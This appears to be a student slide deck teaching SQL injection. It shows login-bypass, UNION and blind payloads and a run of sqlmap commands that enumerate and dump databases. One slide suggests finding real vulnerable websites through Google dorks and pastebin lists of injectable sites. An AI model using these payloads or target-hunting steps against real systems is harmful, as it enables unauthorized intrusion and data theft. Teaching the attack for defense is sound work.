SQL Injection

Lucas Carpio - Jumil Ortiz

What is SQL Injection

•For example:

Websites takes user input from a form
This user input is used literally in the construction of a SQL query submitted to a database.
User sends SQL commands instead of the normal “input” through that form.
SQL query responds hence successful Injection performed.

SELECT Count (*) FROM Users WHERE UserNaME = 'test@test.com' or 1=1--' AND Password=''

Adding new data to the database
- Example eCommerce website selling incorrect items etc
Modifying data
- Examples
- eCommerce with super discounted items
- Accessing Personal data on social networking websites
Gaining Admin Access
- Server/ftp
- Website
- Database

Authentication by pass: Using this attack, an attacker logs onto an application without providing valid user name and password and gains administrative privileges.
Information Disclousure: Using this attack, an attacker obtains sensitive information that is stored in the database.
Compromised Data Integrity: An attacker uses this attack to deface a web page, insert malicious content into web pages, or alter the contents of a database.
Compromised Availability: Attackes use this attack to delete the database information, delete log, or audit information that is stored in a database.
Remote Code Execution: It assists an attacker to compromise the host OS.

SQL Injection and Server-Side Tecnologies

Server-Side Tecnology: Powerful server-side technologies like ASP.NET and database servers allow developers to create dynamic, data-driven websites with incredible ease.
Exploit: The power of ASP.NET and SQL can easily be exploited by hackers using SQL injection attacks.
Susceptible Databases: All relational databases, SQL Server,Oracle,INM DB2, and MySQL, are susceptible to SQL-injection attacks.
Attack: SQL injection attacks do not exploit a specific software vulnerability, instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database.

Error based SQL injection forces the database to perform some operations in which result will be an error.

Exploit databases stored procedures.

Select * FROM users WHERE name = 'x' AND userid IS NULL; --;

Select * FROM users WHERE name = '' or '1' = '1' ;

SELECT name , phone, address FROM users WHERE id=1 UNION ALL SELECT credictCardNumber ,1,1 FROM CreditCardTable

When the results are not visible to the attacker.

Rather than see an useful error message, show a generic message custom message.

Become a time-intensive because a new statement must be crafted for each bit recovered.

•Learn SQL! (pro way)

•Or

•Use prebuilt programs (SQLmap)

Many ways to do this
Easiest way is to go on google.com and in search type
- Index.php?’
- Sql injectable websites pastebin 2015
At the end of the URL, put a ‘ and see if gives you any SQL errors/warning
- http://www.site.com/index.php?id =51’

git clone:
- https://github.com/sqlmapproject/sqlmap.git
Linux Server Access Using Putty/ssh:
- cis-linux2.temple.edu
- astro.temple.edu
Website we will be injecting:
- http://testphp.acunetix.com/listproducts.php?cat=1

$ python sqlmap.py -u "http ://www.site.com/section.php?id=51"
$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" –dbs
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D “specific database parameter”
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D “specific database parameter” -T “specific tables”
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D “specific database parameter” -T “specific tables”